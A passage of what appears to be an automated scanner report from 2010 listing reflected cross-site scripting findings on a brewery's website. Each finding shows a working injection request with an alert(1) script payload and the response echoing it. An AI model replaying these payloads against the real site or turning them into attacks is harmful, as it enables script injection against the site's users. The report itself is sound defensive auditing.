...[SNIP]...
<body id="company95cc6"><a>4a3776524c8_page" class="company95cc6">
...[SNIP]...

1.36. http://www.ninkasibrewing.com/contact/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/contact/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3673a"><a>3f6d411eb9a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contact3673a"><a>3f6d411eb9a/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="contact3673a"><a>3f6d411eb9a_page" class="contact3673a">
...[SNIP]...

1.37. http://www.ninkasibrewing.com/contact/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ninkasibrewing.com
Path:	/contact/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a1f4"><script>alert(1)</script>795f4542f78 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/?4a1f4"><script>alert(1)</script>795f4542f78=1 HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14646

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/?4a1f4"><script>alert(1)</script>795f4542f78=1" method="post">
...[SNIP]...

1.38. http://www.ninkasibrewing.com/contact/content/css/basic.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/contact/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d20c6"><a>9742955dd12 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contactd20c6"><a>9742955dd12/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:50:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="contactd20c6"><a>9742955dd12_page" class="contactd20c6">
...[SNIP]...

1.39. http://www.ninkasibrewing.com/contact/content/css/basic.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ninkasibrewing.com
Path:	/contact/content/css/basic.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload efd65"><script>alert(1)</script>ad60b82afba was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/contentefd65"><script>alert(1)</script>ad60b82afba/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:50:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/contentefd65"><script>alert(1)</script>ad60b82afba/css/basic.css" method="post">
...[SNIP]...

1.40. http://www.ninkasibrewing.com/contact/content/css/basic.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ninkasibrewing.com
Path:	/contact/content/css/basic.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42b42"><script>alert(1)</script>5fe47e91d14 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/content/css42b42"><script>alert(1)</script>5fe47e91d14/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:50:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/content/css42b42"><script>alert(1)</script>5fe47e91d14/basic.css" method="post">
...[SNIP]...

1.41. http://www.ninkasibrewing.com/contact/content/css/basic.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ninkasibrewing.com
Path:	/contact/content/css/basic.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8dca"><script>alert(1)</script>7f9c03b7e41 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/content/css/basic.cssa8dca"><script>alert(1)</script>7f9c03b7e41 HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/content/css/basic.cssa8dca"><script>alert(1)</script>7f9c03b7e41" method="post">
...[SNIP]...

1.42. http://www.ninkasibrewing.com/contact/content/css/basic.css [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ninkasibrewing.com
Path:	/contact/content/css/basic.css

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 980af"><script>alert(1)</script>56ae7003a68 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/content/css/basic.css?980af"><script>alert(1)</script>56ae7003a68=1 HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14667

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/content/css/basic.css?980af"><script>alert(1)</script>56ae7003a68=1" method="post">
...[SNIP]...

1.43. http://www.ninkasibrewing.com/contact/content/css/ninkasi.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/contact/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58806"><a>7369f1313b0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contact58806"><a>7369f1313b0/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:50:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="contact58806"><a>7369f1313b0_page" class="contact58806">
...[SNIP]...

1.44. http://www.ninkasibrewing.com/contact/content/css/ninkasi.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ninkasibrewing.com
Path:	/contact/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c274"><script>alert(1)</script>f1c489d6303 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/content2c274"><script>alert(1)</script>f1c489d6303/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:50:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14666

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/content2c274"><script>alert(1)</script>f1c489d6303/css/ninkasi.css" method="post">
...[SNIP]...

1.45. http://www.ninkasibrewing.com/contact/content/css/ninkasi.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ninkasibrewing.com
Path:	/contact/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82f7e"><script>alert(1)</script>9aa410def61 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/content/css82f7e"><script>alert(1)</script>9aa410def61/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:50:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14666

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/content/css82f7e"><script>alert(1)</script>9aa410def61/ninkasi.css" method="post">
...[SNIP]...

1.46. http://www.ninkasibrewing.com/contact/content/css/ninkasi.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ninkasibrewing.com
Path:	/contact/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cd3d"><script>alert(1)</script>7317fbbfebc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/content/css/ninkasi.css6cd3d"><script>alert(1)</script>7317fbbfebc HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14666

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/content/css/ninkasi.css6cd3d"><script>alert(1)</script>7317fbbfebc" method="post">
...[SNIP]...

1.47. http://www.ninkasibrewing.com/contact/content/css/ninkasi.css [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ninkasibrewing.com
Path:	/contact/content/css/ninkasi.css

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75689"><script>alert(1)</script>73fec1f51e1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/content/css/ninkasi.css?75689"><script>alert(1)</script>73fec1f51e1=1 HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14669

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/content/css/ninkasi.css?75689"><script>alert(1)</script>73fec1f51e1=1" method="post">
...[SNIP]...

1.48. http://www.ninkasibrewing.com/contact/content/css/print.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/contact/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c04d"><a>af08b404133 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contact3c04d"><a>af08b404133/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:50:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="contact3c04d"><a>af08b404133_page" class="contact3c04d">
...[SNIP]...

1.49. http://www.ninkasibrewing.com/contact/content/css/print.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ninkasibrewing.com
Path:	/contact/content/css/print.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 491d9"><script>alert(1)</script>1368f5426b7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/content491d9"><script>alert(1)</script>1368f5426b7/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:50:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/content491d9"><script>alert(1)</script>1368f5426b7/css/print.css" method="post">
...[SNIP]...

1.50. http://www.ninkasibrewing.com/contact/content/css/print.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ninkasibrewing.com
Path:	/contact/content/css/print.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3975"><script>alert(1)</script>25a1ae6dfbb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/content/cssa3975"><script>alert(1)</script>25a1ae6dfbb/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/content/cssa3975"><script>alert(1)</script>25a1ae6dfbb/print.css" method="post">
...[SNIP]...

1.51. http://www.ninkasibrewing.com/contact/content/css/print.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ninkasibrewing.com
Path:	/contact/content/css/print.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aad60"><script>alert(1)</script>24a7647a021 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/content/css/print.cssaad60"><script>alert(1)</script>24a7647a021 HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/content/css/print.cssaad60"><script>alert(1)</script>24a7647a021" method="post">
...[SNIP]...

1.52. http://www.ninkasibrewing.com/contact/content/css/print.css [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ninkasibrewing.com
Path:	/contact/content/css/print.css

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 930c6"><script>alert(1)</script>3fba331014d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/content/css/print.css?930c6"><script>alert(1)</script>3fba331014d=1 HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14667

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/content/css/print.css?930c6"><script>alert(1)</script>3fba331014d=1" method="post">
...[SNIP]...

1.53. http://www.ninkasibrewing.com/contact/content/js/basic.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/contact/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3dd3"><a>cd8ecc31aad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contacta3dd3"><a>cd8ecc31aad/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:50:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="contacta3dd3"><a>cd8ecc31aad_page" class="contacta3dd3">
...[SNIP]...

1.54. http://www.ninkasibrewing.com/contact/content/js/basic.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ninkasibrewing.com
Path:	/contact/content/js/basic.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1adf7"><script>alert(1)</script>54796ec5c3d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

